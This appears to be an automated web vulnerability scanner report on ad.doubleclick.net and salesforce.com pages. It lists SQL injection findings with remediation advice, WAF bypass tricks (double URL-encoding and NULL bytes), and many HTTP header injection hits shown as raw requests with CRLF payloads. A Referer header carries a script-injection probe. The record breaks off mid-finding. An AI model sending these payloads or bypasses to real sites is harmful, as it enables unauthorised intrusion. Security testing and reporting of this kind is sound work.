SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the id cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 22 Apr 2011 16:06:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 22 Apr 2011 15:51:45 GMT
Expires: Fri, 22 Apr 2011 15:51:45 GMT
Cache-Control: private
Content-Length: 4618

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 22 Apr 2011 16:06:46 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 22 Apr 2011 15:51:46 GMT
Expires: Fri, 22 Apr 2011 15:51:46 GMT
Cache-Control: private
Content-Length: 4614
The hiddenlong parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hiddenlong parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The sbs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sbs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The CoreID6 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CoreID6 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The TXNSESSION cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the TXNSESSION cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The cmRS cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cmRS cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The source cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:29:54 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1"><tr valign="top" bgcolor="#FBFFDF"align="Left"><td><STRONG>Error</STRONG></td></tr><tr valign="top" bgcolor="#FFFFFF"><td>This page can't be displayed due to a security violation. Contact support for additional information.<br>The incident ID is: 2759180419420659284.</td></tr></table></td></tr></table></body></html>
The 90043274_clogin cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 90043274_clogin cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The partner cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the partner cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the partner cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 783e8%0d%0ac06670d51f2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /783e8%0d%0ac06670d51f2/x1.aud/salesforce/customcloud/lp;sz=1x1;ord=1303485894655? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a868%0d%0ad0c23c48779 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7a868%0d%0ad0c23c48779/N3493.intergi.com/B5426713.10;sz=300x250;pc=[TPAS_ID];click=http%3A//ads.intergi.com/adlink%2F5205%2F1785959%2F0%2F170%2FAdId%3D1631923%3BBnId%3D8%3Bitime%3D486158650%3Blink%3D;ord=486158650? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
The value of REST URL parameter 1 is copied into the Location response header. The payload 60418%0d%0a34c9f29abd4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60418%0d%0a34c9f29abd4/N3493.intergi.com/B5426713.9;sz=728x90;pc=[TPAS_ID];click=http%3A//ads.intergi.com/adlink%2F5205%2F1785960%2F0%2F225%2FAdId%3D1631923%3BBnId%3D7%3Bitime%3D486157331%3Blink%3D;ord=486157331? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
The value of REST URL parameter 1 is copied into the Location response header. The payload 24a69%0d%0a95608d91e7f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 128d5%0d%0a371e27bda97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 85080%0d%0a1c362817312 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 4ab25%0d%0adf95d629563 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 444c6%0d%0ae6a8292f14b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 79784%0d%0aad9ab883b2f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5c7a0%0d%0ac1c87f28023 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 70979%0d%0a884ebdddc36 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 38d1b%0d%0a18fb41cf4bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 39061%0d%0a54db89200bd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 42451%0d%0a9e7b66d82f4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 65653%0d%0af322941222e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 67945%0d%0ae9c1fd5ec9b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 365d7%0d%0ae3dbdb6049c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5352f%0d%0a5f8bbb61a80 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 4a0e3%0d%0a90648814a15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 430c9%0d%0a639c3de1328 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 6ef0e%0d%0aecce4cabbe6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 4 is copied into the Location response header. The payload d4838%0d%0a4aa22e57a0d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/css/d4838%0d%0a4aa22e57a0d?date=04.22.20114 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the Location response header. The payload ebc7c%0d%0a3ed8cbad4a6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/css/ebc7c%0d%0a3ed8cbad4a6?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the Location response header. The payload ade59%0d%0a2fe7fd351ad was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/js/ade59%0d%0a2fe7fd351ad?date=101221 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the Location response header. The payload 8d5c8%0d%0af90c3e609ab was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /common/assets/js/opinionlab/8d5c8%0d%0af90c3e609ab?date=110127 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D
The URL has moved to <a href="/common/assets/js/opinionlab/8d5c8 f90c3e609ab/?date=110127">/common/assets/js/opinionlab/8d5c8 f90c3e609ab/?date=110127</a>
The value of REST URL parameter 4 is copied into the Location response header. The payload b2e21%0d%0adf42fdeb731 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/js/b2e21%0d%0adf42fdeb731?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the Location response header. The payload 8db5a%0d%0a1d929d68ca9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /common/assets/js/8db5a%0d%0a1d929d68ca9?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the Location response header. The payload 1b145%0d%0a969e86ca9d3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /common/assets/thirdparty/foresee/1b145%0d%0a969e86ca9d3 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]; fsr.a=1303485904836; s_sess=%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B%20s_ppv%3D62%257C0%3B
The value of REST URL parameter 5 is copied into the Location response header. The payload a931d%0d%0afc491a3fb54 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /common/assets/thirdparty/foresee/a931d%0d%0afc491a3fb54 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; fsr.a=1303485893905; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_sess=%20s_ppv%3D0%3B%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B
The value of REST URL parameter 5 is copied into the Location response header. The payload f1f38%0d%0a9190a9037c9 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /common/assets/thirdparty/omniture/f1f38%0d%0a9190a9037c9?date=101221 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D
The URL has moved to <a href="/common/assets/thirdparty/omniture/f1f38 9190a9037c9/?date=101221">/common/assets/thirdparty/omniture/f1f38 9190a9037c9/?date=101221</a>
The value of REST URL parameter 5 is copied into the Location response header. The payload 1e04a%0d%0a284c4d986bb was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
